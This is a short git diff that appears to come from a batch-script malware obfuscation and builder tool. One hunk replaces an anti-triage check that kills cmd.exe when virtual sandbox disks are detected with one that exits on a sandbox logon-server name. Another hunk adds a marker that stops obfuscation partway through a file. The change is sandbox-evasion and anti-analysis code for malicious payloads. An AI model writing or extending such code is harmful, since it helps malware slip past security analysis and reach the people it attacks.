diff --git a/src/util/methods/anti_methods/anti_changes.py b/src/util/methods/anti_methods/anti_changes.py index d77164c..5cac5e5 100644 --- a/src/util/methods/anti_methods/anti_changes.py +++ b/src/util/methods/anti_methods/anti_changes.py @@ -63,7 +63,7 @@ def vm_test(): @staticmethod def anti_triage(): code = [ - '''powershell "$KDOT = wmic diskdrive get model;if ($KDOT -like '*ADY HARDDISK*' -or $KDOT -like '*EMU HARDDISK*') { taskkill /f /im cmd.exe }"''', + """echo %LOGONSERVER% | findstr /i "DADDYSERVER" >nul && exit""", ] return random.choice(code) diff --git a/src/util/obfuscation/obfuscate.py b/src/util/obfuscation/obfuscate.py index 6bb0262..7a09c1f 100644 --- a/src/util/obfuscation/obfuscate.py +++ b/src/util/obfuscation/obfuscate.py @@ -186,8 +186,20 @@ def obfuscate(self, file): continue else: + global_stop_obf = False for word in line.split(): # check if any of self.used_env_vars are in the line + if global_stop_obf: + log.debug("Global stop obf True") + f.write(word + " ") + continue + + if word == "%STOP_OBF_HERE%": + global_stop_obf = True + log.debug("Stop obf True") + f.write(word + " ") + continue + if re.search(escape_regex, word): log.debug("escape True") f.write(word + " ")